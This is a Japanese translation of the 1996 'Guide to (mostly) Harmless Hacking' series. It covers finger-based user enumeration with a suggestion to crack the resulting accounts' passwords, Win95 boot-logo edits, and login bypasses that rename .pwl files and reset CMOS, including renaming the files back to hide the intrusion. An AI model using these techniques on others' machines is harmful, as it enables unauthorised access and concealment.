HARMLESS HACKING Vol. 1 Number 3 今日のハッキング:他のコマンドと同様、fingerコマンドを利用してどうやって 非公共的なInternet Hostの情報をクラックするか。 _______________________________________________________ FINGERコマンドで相手のサーバーの詳細を入手して喜ぶ前に、まずはリラック スしろ。私はステップ−バイ−ステップで説明など行わない。それに巷に転がっ てるようなクラッキングプログラムなんかもnewbie達に配布して、HOSTに不正ア クセスさせるような猿真似など行う気も毛頭無い。 ここでアナタが目にする内容とは、FINGERでのクラッキングにおける基本的な理 論とテクニックを内容とした文章である。実際ここで説明されている内容自体、 実行すればそれなりに楽しいし、一定のラインを越えない限り犯罪行為とも見な されないし、さらにアナタが契約しているインターネットのHOSTの安全性等も知 る事が出来る。 ここでの説明を利用して実際に行動に移し、Crackerに成る事も出来る。それは勿 論アナタのチョスである。でもその後のアナタの彼女が独房の仲間で“スパイク(男)” なんて名前の奴になるのはゴメンだろう。 ********************************* Newbie note #1:人々は“Hacking”と“Cracking”の意味を同じだと考えている。 しかし“Cracking”とはコンピューターに対して違法的に侵入する行為だと考え てよい。“Hacking”とは基本的に違法行為や被害を与えないで、コンピューター で出来る全ての行為を指す) ********************************* これを行うには、下記のようにHOSTコンピューターにコマンドを与える。 finger Joe_Blow@boring.ISP.net このコマンドでアナタのコンピューターがPORT 79でboring.ISP.netというHOSTへ の接続を開始する。そこでHOST内の.planと.project filesに書かれているJoe_Blow という人物の詳細を表示するのである。 しかしHappy Hackerの方法とは、まずport 79でのTelnetでboring.ISP.netに接 続する。 telnet boring.ISP.net 79 それは下記の2つのコマンド入力でも可能な場合もある。 Joe_Blow finger Joe_Blow この2つの方法で、finger Joe_Blow@boring.ISP.netと同じ結果が出るハズだ。 この時点でアナタがCrackerなら、TelnetでPORT 79に接続して得た情報を利用 してさらに色々な事を行うだろう。 しかし私はこのテキスト上で犯罪を教える気は無い。だから私はここで基本的な FINGERコマンドで、どのようにboring.ISP.netをCRACKするかを教える。そしてこ のテキストでお前は合法でありながらもFINGERで色々な情報を入手するかも学べ るだろう。 例として、一部のサーバーは下記のようなコマンドでFINGERプログラムを実行さ せる。 finger @boring.ISP.net もしこのFINGERコマンドでシステムが反応したら、下記のような表示が出てくる。 [boring.ISP.net] Login Name TTY Idle When Where happy Prof. Foobar co 1d Wed 08:00 boring.ISP.net この表示で、現在一人のユーザーがloginしており、そして該当者は現在何もして いないという事が分かる。つまりこの時点でこのHOSTに不正行為を犯そうとしても、 誰も気が付かないだろう。 FINGERのPORTが起動する他のコマンド入力方法は下記のようである。 finger もしこのコマンドが実際に使用出来るなら、HOSTに登録されているユーザー全員 のリストを表示するハズ。それらのユーザーネームはパスワードクラックとして も使用出来る。 一部のシステムではパスワード設定の際、ある程度の規制が強いられていない。 これは非常に危険な事である。共通するようなパスワードを使用しているという 事は、パスワードが無いのと同じ意味である。例を上げればUserNameとPassword が同じ、ユーザーの名字と名前、そして“guset”といった名前である。しかし 実行の際でこれらの例が一つも使えなかったら、予め辞書に指定された名前や電 話番号等といった文字を比較してパスワードをクラックするソフトがあるので、 これの使用を勧める。(John The Ripper、Crack Jack) ******************************** Newbie Note #2:アナタのパスワードは安全?もしShell Accountを持っているな ら、下記のコマンドでパスワードを変える事が出来る。 passwd パスワードは辞書や電話帳等に載ってるような文字を使用しないこと。最低でも 6文字以上のパスワードにすることだ。そしてそれが発音出来ないような文字の もする。 ******************************** 他のFINGERで反応するものをいくつか紹介する。 finger @ finger 0 finger root finger bin finger ftp finger system finger guest finger demo finger manager それか、時々エンターキーだけでFINGER情報が表示されることもある。 現状において沢山もの起動する/起動しないコマンドが存在する。大抵のシステ ム内でのFINGERプログラムは使用出来ない。それはシスアドが第三者に個人の 情報を漏らしたくないということからである。さらに注意深いシスアドだと、 FINGERプログラムをDISABLE(使用不可能)にし、そうする事によってPORT 79 でのアクセスも完全に制御するようにする。 そして私が今まで紹介したコマンドにROOTアクセスが行なえるような物は無い。 これらはただ情報を表示するだけのコマンドなのである。 ************************* Newbie note #3: Root! It is the Valhalla of the hard-core cracker. "Root" とはマルチユーザーコンピューター上でのアカウント名の事で、サーバー上の絶 対権限を持っている。このアカウントで、他人のアカウントを使用出来るし、内 部のファイルを読み、さらに変更し、そして起動される事も出来る。そしてROOT を持ってれば、ISPのデーターも完全に破壊する事も可能なのである(私はけして 勧めない) ************************* FINGERプログラムに関してISPに問い合わせる事自体、けして違法ではない。し かし最悪な事は、プログラムを完全に破壊することもありうるという事である。 Crash...fingerがcrashesがどうなるか? ではここで実際にFINGERプログラムが何を行なうか考えてみよう。これはアナタ がPORT 79にTELNETで接続して初めて行なえるプログラムである。一度接続出来 たらコマンドを与えれば相手はアナタが選んだユーザーのファイルを調べ、それ を表示してくる。 つまり、FINGERは全てのアカウントを調べる事が可能なのである。 つまりもしCRASHすれば、アナタのRoot権限が無くなってしまう。 もしアナタが何処かのHOSTのROOTアクセスを入手したら、ただちのそのシステム から離れること。そして万が一の捕まった時の為に警察とシスアドに対する弁解 のセリフも考えておくことだ。 もしアナタが ///*^SといったFINGERコマンドでFINGER CRASHを行なったら、言 い訳の際、アナタが何も知らないで公共に公開されているような情報を探してい たなんて弁解しても、先ず誰も信じてくれないだろう。 ***************** YOU CAN GO TO JAIL TIP#1:一般に公開されていないシステム内に侵入する事は違 法行為である。さらにもし電話回線やインターネットを利用し合衆国外において 不正アクセスを犯した場合は、重罪を犯した事になる。お前は何も相手に損害を 与えるようなつもりが無くてもである。さらにROOTアクセスを入手しシステム内 に侵入する行為も犯罪なのである。 ***************** これがエリートなら、まずFINGERでROOTをクラックして、何も行なわないで素早 くその場を去る。 彼らが曰く、まずCRACKINGへの焦りとは、自分が“出来る”と いう気持ちから現われる。だからマズは気持ちを抑さえる事が大事なのである。 そしてエリートの中のエリートはシステムをクラックした後、今度はそれをクラ ックしたHOSTのシスアドに報告、さらにどうやってセキュリティーホールをどう 直すかも教えてあげるのである。 ************************************ YOU CAN GO TO JAIL TIP #2: お前がコンピューターに不正アクセスした時、ア ナタがコマンドを与えた時のパケット上のヘッダが、結局アナタガ誰かをシスア ドに対して教える仕組みになっている。このテキストを読んでいるという事は、 お前はそれを隠す方法まで知ってる程のレベルではないという事だろう。分から なければけして行動に移すな。 ************************************ で、アナタがFINGERでROOTを入手する確率とは一体どれくらいだろうか?今まで に何百万というHACKER達がFINGERでROOT入手か可能なHOSTを見つけだしてきた。 そして勿論ISPもそれに対応し、そこらへんのセキュリティーホールは完全に直さ れた。ではこれでもう可能性は0だろうか? 答えはノーである わずかながら可能性はある。 未だにシステム上にFINGERサービスを行なっているいるシスアドは非常に危険 である。もしお前がそういったISPを利用しているのであれば、自分に聞いてみ よう。「果たして危険を犯してまでこの方法でインターネットを通して自分の存 在をアピールする意味があるだろうか?」 __________________________________________________________________ Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first two, I'm at cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking! _______________________________________________________ Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end. To subscribe, email cmeinel@techbroker.com with message "subscribe hacker " substituting your real email address for Joe Blow's. ___________________________________________________________________ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +このテキストはWINDOWS 95英語版を基準に書かれています。 + +もし下記の情報を実際に使用し、自らのPCが壊れたとし + +ても私は一切責任を負いません。英語の分からない人、PC + +に詳しくない人、自分に自信の無い人は実行しない事を勧め + +ます。 テキストに関する苦情や意見等は下記のメールアドレ+ +スでお願いします。 + + + + plutur@hotmail.com + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Beginners' Series #2, Section One. Hacking from Windows 95! ____________________________________________________________ 注:これは初心者を対象として書かれている。だからスーパーHACKER達や、エリ ートと称するHACKER達にとってこのテキストは何の意味も無い。「こんなのめち ゃくちゃ簡単じゃねえか!!ふざけんじゃねぇぞ!」みたいな事を言う気なら、 初めからこんなとこにいないで"Unix for Dummies"みたいな本でも読んでろ。 先ず頭の良いHACKER達が何故AOLを利用しない理由とは、AOLはUSERにSHELL ACCOUNT を提供しないからである。AOLはUNIXを導入する事に非常に危険を感じている。 それはUNIXがこの世のOSで最高、エキサイティング、パワフル、そしてなんと言 ってもHACKER達と最も仲の良いOSだからである。まぁまぁ落ち着け。とにかく私 自身UNIXが無いと気分も優れなくなる。そんな訳でAOLはUNIXのSHELL ACCOUTを USERに提供する事がOS自身をHACKされる危険性があると判断し、提供しないこと に決めたのである。 そして残念な事にこの考えが現状において沢山のISPの間で広まっている。今日 までに沢山のISPがUSERに対しSHELL ACCOUTの提供を中止している。 しかしもしアナタがUNIXのSHELL ACCOUNTを持っていなくてもHACKINGは出来る。 ただ必要な物としてWINDOWS 95が起動出来るコンピューターと、AOLやCOMPUSERVER みたいな間抜けなOnLine ACCOUNTがある。 このBeginner's シリーズ#2はWINDOWSでOn Lineサービスを行なっている相手に 出来る“愉快”事を紹介する。そしてそれらは非常に簡単に出来てしまうという 事を覚えておいてもらいたい。別に秀才になる必要も無いし、コンピューター技 術者になる必要も無いし、高価なコンピューターを購入する必要も無い。Windows 95 だけで出来る方法が存在するのである。 Section 1:まずアナタのWindows 95を外見的にカスタマイズする。Start Up、バ ックグラウンド、Log Offの時のスクリーン、とにかく自分が出来る事を全てや って、友人の度肝も抜かせ、差をつける。 Section 2:大抵の学校は生徒達に不正行為を行なわない事を願っている。自分 自身対して証明しろ!友達や同僚等にも証明しろ!!Windows 95のパスワード なんて全く使い物にならないって事を!! Section 3:他のコンピューターを調べる。じゃあちょっと極端な例を上げれば AOLを利用してWINDOWSでハックが出来る ========================================================== /////どうやってWINDOWS 95を外見的にカスタマイズするか///// ========================================================== では仮にアナタの家でパーティでも開かれたとする。そこでアナタは友人達に自 分が他の有名なHACKER達と同じくらいのレベルだという事を見せつけたい。そこ でまずコンピューターの電源の付けてるとWindows 95のロゴがスクリーンに表示 される。これってなんか貧弱な感じに見えないかい?これじゃお前のコンピュー ターも他の連中のコンピューターと全く同じである。IQが80代くらいしか無いア ホが管理しているようなワークステーションのコンピューターと同じじゃカッコ 悪い。ここでアナタが本気でHACKERを思っているならPCにLinuxやFreeBSDや、 その他のUNIXを入れ、BOOTさせる。しかしここでアナタの友人それが何だか分か らない。つまりBoot Upスクリーンを表示させるだけでアナタは、他の連中にま るでエリートだと思わせる事が出来る。 ではここでアナタがコンピューターをBootUpさせてスクリーン上に“K-Rad Doomsters of the Apocalypse”という文字を表示させたいとする。これについてはいたっ て簡単である。 MicrosoftはUSERが毎回BootUpするたびに自社のOSを画面に表示し宣伝するよう にしてある。しかしその本旨とは、店内でディスプレイされているコンピュータ ーにMicro$oftのBootUpスクリーンを表示させたいが為に、こういった設定にな っているのである。 だからMicrosoftだってそう簡単にBootUpスクリーンを変えてほしくはない。そ の為MicrosoftはBootUpのスクリーンソフトウエアを隠してしまったのである。 今回このテキストではそういったMSの考え等をどのように阻止するかを学ぶ。 *********************************************** Evil Genius tip: HACKING行為で最も大事な事とは、内部に隠されている重要な ファイルを捜し出す事である。そしてそれを色々と変えてしまうのである。 こういった無害なグラフィックファイルが何故SYSTEM FILEのように示されて るか----ただのグラフィックファイルなのに----その理由は例えばUSERが "Welcome to Windoze 95 -- Breakfast of Lusers!"みたいに勝手に内容を変えて しまうこと恐れているからである。その為にこのファイルをRead Onlyにし、さ らに隠しファイルにして、その上そのファイルをSYSTEM FILEと呼び、仮に余計 な変更を行なったらコンピューターごと壊れてしまう恐れがあると印象付ける為 にこういった真似を行なっているのだ。Microsoftはそういった変更をされない ようにUSERにトリックをしかけているのである。 *********************************************** ではここでMicro$oftのロゴを止め、アナタのオリジナルStartUpロゴを使用する 簡単な方法を紹介する。まずMSPaint programを出す。これはアクセサリーフォ ルダに入っていると思うが、とりあえずしっかりと順序よく安全に作業がこな せるようにその手順を紹介する。 1)画面左下の【スタート】をクリックする。 2)【プログラム】に行き【ウインドウズエキスプローラー】をクリックする。 3)【ツール】をクリックする。 4)【Find】をクリックする。 5)【files or folders】をクリックする。 6)【named】の隣にMSPaintと入力する。 7)【Look in】の隣にC:と入力 8)【include subfolders】にチェックをする。 9)【find now】をクリックする。 10)検索されたファイルのアイコンをダブルクリックする。 これでPaint Programが起動される。 11) Paint Program内の【file】をクリックする。 12)【open】をクリックする。 この時点で画面にMSPaintが表示されたハズ。ではここでめちゃ簡単な方法で 自分のオリジナルBootUpスクリーンの作り方を説明する。 13) File Nameの横にc:\windows\logos.sysと入力する。これでお前のグラフィ ックを“It's now safe to turn off your computer.”というロゴに持って 来させる。このグラフィックはStartUpグラフィックとFORMATが同じである。 だからImages Menu Attributes Screenを変えない限りどんな好きなことで も出来るのだ。 14) ではここである写真を使って実験してみよう。 15)自分の気に入っている写真をディレクトリC:\logo.sysにセーブする。これは WINDOWSのStartUpロゴを上乗せする形でセーブされる。この時点でお前はどん な時でもlogo.sysを変更出来るようになった。 16)そして同じ要領でShut Downスクリーンを変える事も出来る。最初のShut Down スクリーンがセーブされているディレクトリはc:\windows\logow.sysという名 である。そして上記のように最後に表示される"It's now safe to turn off your computer"というグラフィックはc:\windows\logos.sysという名になっている。 17) グラフィックを壁紙として使用出来るようにしたいなら、c:\windows\evilhaxor.bmp というように、ファイル名の拡張子をbmpにすればいい。 ******************************************************** Evil Genius tip: Microsoft Windows 95 StartUp Screenは下の部分にanimated barがあるが、これは一度画像で上書きすれば消える。しかしBMP Wizardという シェアウエアプログラムで画像でのStartUpスクリーンを作成する事も可能であ る。下記にダウンロード出来るURLを紹介しておく。 http://www.pippin.com/English/ComputersSoftware/Software/Windows95/graphic.htm http://search.windows95.com/apps/editors.html http://www.windows95.com/apps/editors.html ******************************************************** ではここでWin95のロゴファイルを変更しての問題点とは、予め設定されている 色でしか使用出来ないのである。もしどうしても他の色を使用したいのなら再度 MSPaintを起動させる。そして最初に"Image"をクリックして次に"attributes" をクリックする。そして縦を320、横を400に設定する。これでお前はどんな 色でも使用出来るようになる。製作した画像をc:\logo.sysのようにセーブして StartUp用画像にする。それかc:\windows\logow.sysもしくはc:\windows\logos.sys とでもセーブし、その画像をShut Downロゴにする。それかもしお前がどうして もWin95のShut DownロゴやStartUpとして使用したい画像があるなら、巷のハッカー 関連HPで入手可能だ。下記がその方法である。 1) 「おおっ!この画像めちゃカッコいいじゃねぇか!」ではここで“print screen” ボタンを押す。 2) MSPaintを起動させ、横320パルス、縦400パルスに設定する。 3) Editをクリック、次にPasteをクリックする。これでその画像はMSPaintに 移動されたハズだ。 4) これをセーブする。そして画像表示がしっかり320X400パルスか確認する。 それをc:\logo.sys、c:\windows\logow.sys、c:\windows\logos.sys、それ かc:\winodws\evilhaxor.bmpのように、用途に分けて名前をつける。 勿論全く同じ事をMSPaintや他のグラフィックPROGRAMで開いて出来る。当然正し いファイルネームと正しいディレクトリで320X400パルスのサイズでの話である。 げっ!!ここでの叔母のスージーさんが家に遊びに来て、俺のコンピューターで 彼女のメールを確認したいなんて言ってやがる!!俺のStartUpスクリーンを 見て説教たれたって、そんな最後まで聞く耳持たないぜ!! ではここでStartUpスクリーンをMicrosoftのくだらないロゴを戻す方法を教えよう。 スージー叔母さんがPCに手を触れる前に、ただc:logo.sysの名前をlogo.bak みたいに変えればいい。さて何が起こるか?Microsoftの連中は我々が"io.sys" ファイルに入ってるBootUpスクリーンに何かしたと考える。だからお前がオリジ ナルのlogo.sysをRenameもしくはDeleteして、それに該当するファイルが見つか らなければBootUpの時に例のダサイWindows 95 BootUpのロゴを表示する。 ************************************** Evil genius tip:IO.SYSやLOGO.SYSで遊んでみたいかい?じゃあ説明しよう。 そしてこの方法はなんとWINDOWSコンピューターに侵入する際にすごく役立つ のだ -- それについては次回のセクションにて説明する。 ではまず「Start」をクリック、"MS-DOS"に行ってMS_DOS PROMPTから下記の コマンドを入力する。 ATTRIB -R -H -S C:\IO.SYS ATTRIB -R -H -S C:\LOGO.SYS これで後はお前のモノだ。hihihi... ************************************** 今回はこれにて終了する。お前らエリートHACKER達でこのテキストを読んで あまりのクダラナサに怒ってるなら、そりゃご苦労様だな。俺は事前に忠告 したハズだぞ。 __________________________________________________________________ Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first two, I'm at cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking! _______________________________________________________ Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end. To subscribe, email cmeinel@techbroker.com with message "subscribe hacker " substituting your real email address for Joe Blow's. ___________________________________________________________________ _______________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Beginners Series #2, Section 2. Hacking into Windows 95 (and a little bit of NT lore)! ____________________________________________________________ 注:これは初心者レッスン用である。初心者だぞ!!これを読んでいる連中で、 秀才な才能を持ち、生まれながら32-Bit Windowsを知っているような奴は、 すぐにでも読むのをやめていただきたい。私は君等の、ここに書かれてい る内容を知らない連中に対する中傷的なセリフには全く興味が無い。 このレッスンは、現在Workstation型Operating Systemで最も使用されている Windows NTに対し、どうHackをするかについてを説明する。事実、Windows NTは Local Area Network (LAN)、Internet、Intranet、そしてWeb Serverなどで広く 使用されている。だからもしアナタが自分自身を本物のHackerと称したいのであ れば、Win NTを勉強するのは欠かせない事なのだ。 このレッスンではWindows 95とWindows NT両方に対して、自分のコンピューター から、完全に安全で、かつ有益な重要的Hackingテクニックについて学ぶ。 このレッスンで説明する事とは: # Windows 95のLogin Passwordを幾つかの方法でHackする # Pentium CMOS passwordをどうHackするか # Windows Registry - WindowsベースのLAN、Internet、Intranet、そしてWeb ServerのAccess Controlが隠されている場所 - へのHack方法 ではレッスンを開始しよう。まずアナタの部屋には自分の仲間達が、アナタがど うWindows 95をHackするか見に来ている。とりあえずアナタはこの段階で工業的 でオリジナルのBootup Screenを仲間達に見せており、既に連中は、アナタがどれ でオリジナルのBootup Screenを仲間達に見せており、既に連中は、アナタがどれ ほど大変なエリートだという事に気づき始めている。では次に何をすればいいだ ろうか? では【スタート】をクリックし、【セッティング】をクリックし、【コントロール パネル】に行き、そして【パスワード】に行く。そして仲間達に自分のパスワード を教え、そしてそのパスワードで秘密の画面に入る。そしてコンピューターを終了 させて、ここで先ほどのパスワードがどれくらい簡単に速く盗め、そして自分の 元々のWindows画面に戻るかを教えるのである。 これは非常に簡単な事なのである。私自身、この事を教えることに非常に当惑 さえ覚えている。私がこの事実を教えると、きっとアナタは「なに?これをパス ワードプロテクションと呼んでるのか?こんなんじゃどんな間抜けでも簡単に 侵入出来ちゃうじゃないか。」と言うだろう。しかしそう言ってもアナタは正し いのである。だがそれがMicro$oftのやり方なのである。ここで覚えといて欲し いのは、今回のレッスンでアナタは自分自身のWin 95を、より秘密に保つ事を 覚えるのである。 そしていつかアナタがWindows NTのhackingの勉強をする時、このMicro$oftの 思考を覚えといてもらいたい。面白い事に一部のHacker連中はWindows NTへの Hackingに手を焼いている状態である。それは連中がUNIX - Hackingに忙しいか らである。しかしWindows NTには、まだ世間に公開されてなく、驚くべき事実 が沢山隠されているのである。アナタは一度いかにWin 95への侵入が簡単に行 なえるかという事実を知ったら、我々の協力を得る必要無く、Windows NTへの Crackが出来るということが骨に染みるほど分かるだろう。 しかしここで仲間達がアナタがどれほどエリートなHackerかを見ている会話に 戻ろう。アナタはきっと仲間達に後ろに振り向いてもらいた、そうすれば1分 でWin95に侵入しかただけのみ分かる。それともアナタが逆に親切なタイプで、 連中にその方法を教えるかである。 しかしここでひとつ注意点がある。ここで私が紹介する最初幾つかのテクニッ クは自宅なのどWin 95インストールマシンには通用する。しかし、特にLocal Area Networks (LAN)では幾つかのテクニックは通用しないのである。でも怖が る事はない。ここでレッスンで、我々はどんなWin 95でも”絶対”にアクセス 件を得る方法を十分なまでに紹介する。とりあえずここではまず初歩的な方法 から説明に入ろう。 簡単Win 95侵入編 #1: Step 1:コンピューターをブートアップ(起動)する Step 2:画面にSystem Configurationの表示が出て来たらキーボードのF5を押す。 仮にアナタのシステムがこの画面の表示させなくてもF5を押し続ける。 もしアナタのシステムが正しくセッティングされているなら、この時点でアナタ はSafe Modeにいる。きっと全てが異常に写っているように見えるだろう。しか しここでパスワードを与えなくてもプログラムを実行させる事は可能なのである。 めちゃ簡単だろ!!よし、ではここでもっと高等な技術を使用して行なってみた い輩の為に、他の方法で新しいパスワードに侵入する方法を説明しよう。 簡単Win 95侵入編 #2: Step 1 : ブートアップさせる Step 2 : 画面をSystem Configurationに持っていったらキーボードのF8キー を押す。これでMicrosoft Windows 95スタートアップメニューに行け る。 Step 3 : 7番を選択する。これでMS-DOSに入れる。そしてPromptで下記のコマ rename c:\windows\*pwl c:\windows\*zzz. **************************** Newbie note:MS-DOSとは1981年から導入され、今では化石化したMicrosoft Disk Operating Systemの略である。これはコマンドラインOS、つまりPrompt が表示され、(例えばc:\>)ここにコマンドを入力し、エンターを押して実行 させる。MS-DOSとはDOSと省略されて呼ばれることが大抵であり、内容はUNIX とも似ている。実際初期バージョンでは何千にもおよぶUNIXコードから作られ ている。 ***************************** Step 4 : 再起動させる。すると画面にパスワード入力のダイアログが表示され る。ここで仲間達をダマす為に適当にパスワードを入力する。すると 再度同じパスワードを入力を要求してくるので、今デタラメに作った パスワードを確認の為に入力する。 Step 5 : しかしアナタの仲間もそこまで馬鹿ではない。今アナタが新たにパス ードを新規したことくらい分かっている。だろ?まぁここで仲間が 選んだ古いパスワードを選んでもいい。そしてFile Manager、Explorer それかMS-DOS、どの道具を使ってもいいので*.zzzを*.pwlにファイル 名を変える。 Step 6 : そしてまた再起動、そして仲間達が作った秘密のパスワードを使用 してみる。でもちゃんと使えるのである! 考えてみよう。仮に誰かがこの方法を使用して実際の所持者のWin 95に侵入した 時、その被害者が侵入者が居たという事実に気づくには最近のファイルを調べて、 *.pwlファイルが*.zzzファイルに変わっているという事を見つける以外方法が無 いのである。 **************************** 悪魔のささやき:msdos.sys fileのbootkeys=0 optionが起動しているなら起動 最中においてF4、F5、F6、F8、Shift+F5、Control+F5そしてShift+F8が使用可能 である。これらで遊んでみよう。 **************************** ではここで仮にアナタのWindows 95が起動キーに反応しないとしよう。まだ他の やり方でで侵入する方法がある。 もしアナタのWindows 95が起動キーに反応するなら、安全対策の為にきっと起動 しないように設定したいだろう。でも友人や仲間達にいろいろな起動キーを紹介 して、そしてこれらの遊び方を紹介し、後でキーを起動出来ないように設定して 仮に友達がアナタのコンピューターを色々イジクリ回されてもいいように安全策 を整えるというのもなかなか楽しい。 最も簡単 --しかし最も遅い-- 方法で起動キーを使えないようにするにはWindows 95 をインストールする際にその様に設定するのである。しかし我々はHackerだ。や はり最も素早い方法で同じ事をしたい。ここで我々はWindows 95のmsdos.sysファ イルをどう編集するかについて学ぶ。 Step 0 : アナタのコンピューターの内容を全てBackUpする。特にシステムファイ ルは忘れないように。そしてWindows 95の起動ディスクを作るのも忘れ ないように。我々はこれから燃えるような事を行なうのだ!もしアナタ がこれを他人のコンピューターで行なおうとしているのなら、本来の所 持者がアナタにコンピューターを壊していいかを許したか、それか自分 が重大なミスを犯さないという自信がある、どちらか2つを信じよう。 ******************************* Newbie note : 起動ディスクをもて持っていない?そりゃ恥!恥!恥だ!自分の 仲間が万が一アナタのコンピューターでイタズラを起こしても壊しても良いよう にどんな奴でも起動ディスクは持っていなくてはいけない。もし起動ディスクを 持っていない奴の為に、ここで作り方を紹介する。 これを作るにはまず空っぽのフロッピーディスクを一枚ディスクに入れる。そし て【スタート】をクリックし、【セッティング】そして【コントロールパネル】 に行く。そして【プログラムの追加と削除】に行って【起動ディスク】に行く。 ここからは指示に従えばよい。 ******************************* Step 1 : 先ずmsdos.sysを見つける。これはRoot Directory(大抵はC:\)にあ る。これはもともと隠しファイルなので、このファイルを見つける一 番簡単な方法とは、【マイコンピューター】に行き、Boot Drive(大 抵はC:)をマウスで右クリックする。そしてExploreを出し、右サイド のフレームで下に移動すれば、msdos.sysを見つけられる。 Step 2 : msdos.sysを書き換え可能に設定する。これを設定するにはmsdos.sys を右クリックし、そしてプロパティを左クリックする。これで画面に Read Onlyとhidden両方のボックスのチェックを外す。これでワードプ ロセッサーで編集が可能になる。 Step 3 : msdos.sysをWord Padで立ち上げる。ここではWord Padを使用するのが 重要である。Notepad(メモ帳)や他のワードプロセッシングプログラ ムではいけない。立ち上げたらmsdos.sysをダブルクリックし、起動さ せる。 Step 4 : この時点で編集の準備は整った。画面を見るとWord Padがmsdos.sysを 立ち上げているだろう。それが終わると、下記のような表示が仮面に 現われる。 Paths] WinDir=C:\WINDOWS WinBootDir=C:\WINDOWS HostWinBootDrv=C [Options] BootGUI=1 Network=1 ; ;The following lines are required for compatibility with other programs. ;Do not remove them (MSDOS>SYS needs to be >1024 bytes). ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx... ではここでキーを起動出来ないように設定するには、[Options]の下にBootKeys=0 と入力すればいいのである。それか他の方法でキーを起動出来ないようにするに は、BootDelay=0と入力してもいい。このどちらかの文字を入力するだけで、アナ タはダサイwannabe hacker連中をパニックさせる事が出来る。後はmsdos.sysを 保存すればいい。 Step 5 : 元々msdos.sysはコンピューターにとって必要不可欠な物だけあって、 初期設定のままで保存した方がいい。【マイコンピューター】をクリ ックし、Exploreに行く。そしてBoot Drive(大抵はC:\)をクリック し、その中にあるmsdos.sysを見つける。見つけたらmsdos.sysをクリ ックし、左クリックでプロパティを出す。そしてRead Onlyのボックス にチェックを入れる。 Step 6 : ひょっとしてアナタはウイルススキャンのプログラムを起動させてい るだろう?アナタが後ろ振り向いている最中に仲間がアナタのコンピ ューターに何をしだすか分かったもんじゃない。ここでコンピューター を再起動させるとアナタのウイルス検索ソフトとは先ずmsdos.sysが 変更されているとい事実を発見する。そしてこれは非常に危険な状態 だと判断し、変更前の設定に戻させるようにする。アナタはそれを止 めさせないといけない。私はNorton AntiVirusを使用しているが、こ れを止めさせるには、(以下不明) msdos.sysファイルを変更する方法(上級編) Step 0 : これはいつかアナタがNT、LAN、WebそしてInternet Server等でDOS上 でrampantする時に非常に役立つ。Windows 95起動ディスクをA:ドライ ブに入れてコンピューターを起動させる。するとDOS promptが表示され A:\と出て来る。 Step 1 : msdos.sysを書き込む可能にする。attrib -h -r -s c:\msdos.sysとコ マンドに入力する。(これはC:\にmsdos.sysがあるとする) Step 2 : 次にedit msdos.sysと入力する。これで指定したファイルがワードプ ロセッサ上にあらわれる。 Step 3 : 編集プログラムでmsdos.sysを編集する。終わったら保存して編集プロ グラムを狩猟させる。 Step 4 : DOS Promptでattrib -h -r -s c:\msdos.sysと入力し、msdos.sysを 元々の隠れRead Onlyシステムファイルに戻す。 OK、この時点でアナタの起動キーは使用不可能になった。ではこれで誰も絶対に アナタのコンピューターに侵入出来ないと言えるだろうか?実はまだこれでは不 十分である。 この【msdos.sysファイルを変更する難しい方法】解説で、アナタも予想してた かもしれないが、WIN 95に侵入する為に次に行なう方法として、A:ドライブから 起動ディスクを使用する方法がある。 起動ディスクを使用してWIN 95に侵入する方法 Step 1 : コンピューターを終了させる。 Step 2 : 起動ディスクをA:ドライブに入れる。 Step 3 : 起動させる。 Step 4 : A:\Promptの状態で、下記のコマンドを入力する。 rename c:\windows\*.pwl c:\windows\*.zzz. Step 5 : 自分の行為を隠すためにPasssowd Fileを元の名前に戻す。 おっ!こんなのめちゃ簡単じゃないかっ!ではアナタのコンピューターを、イタ ズラ仲間から守るにはどうしたらいいか。まぁここでひとつだけ出来ることがあ る。これは元々LAN環境でシスアドが個々のコンピューターの衝突などから防ぐ 為に使用されているトリックである。その答えとは --良い答えとは言い切れな いが-- CMOS passwordを使用することである。 CMOSでの遊び方 #1 幾つドライブがあるか、どの種類のドライブがあるか、起動する時にどのドライ ブが使用されるかといった基本的セッティングを管理しているのがマザーボード に付いてるCMOSである。この小さなバッテリーがCMOSをいつでも起動させており、 毎回ユーザーがコンピューターをONにしてもちゃんと起動設定通りに、最初に どのドライブをチェックしないとけないか覚えている。一般的に自宅で使用され ているコンピューターは、最初にA:ドライブからチェックするように設定されて いる。そしてA:ドライブが空っぽだったら、次にC:ドライブを調べるように設定 されている。 私のコンピューターでは、もしCMOS設定を変えたい時に、一番最初の起動の起動 画面でキーボードのDELETEキーを押す。そして私は予めCMOS設定にパスワード入 力を出すように設定している為、ここで私はパスワードを入力しなくてはならな い。 もし私が誰かにA:ドライブから起動して私のパスワードファイルをメチャクチャ にしてほしくないと思ったら、その様に設定してC:ドライブのみ起動させる事が 出来る。そしてさらにLANのRemote Driveから起動させる事も可能なのである。 ではWin 95でA:ドライブから起動しないコンピューターに対して侵入する方法は あるだろうか?答えは勿論YESである。しかしこれを行なう前に、何処かに今の 自分のCMOS設定を”全て”控えることだ。そして自分のコンピューターが完全に 壊れるのを覚悟すること。CMOSハッキングはSystem FileをHackするよりも更に 危険な行為なのである。 Step 1 : スクリュードライバー、ハンダゴテ、そしてハンダゴテのカスを拾う 何かの3点を用意する。 Step 2 : 被害者のケース(コンピューター)を開ける。 Step 3 : バッテリーを外す。 Step 4 : バッテリーを再度付け直す。 Alternate step three: many motherboards have a 3 pin jumper to reset the CMOS to its default settings. Look for a jumper close to the battery or look at your manual if you have one. For example, you might find a three pin device with pins one and two jumpered. If you move the jumper to pins two and three and leave it there for over five seconds, it may reset the CMOS. Warning -- this will not work on all computers! これでアナタのコンピューターはCMOSが標準設定になったと思う。では最初に Aドライブを確認しない他は、全ての設定を元通りにしする。 ******************************* ひょっとしてクビになるかも注意:もしこれを実際に実行し、そして失敗して、 さらにそれが仕事場で使うコンピューターなのであれば、何かマトモな理由で 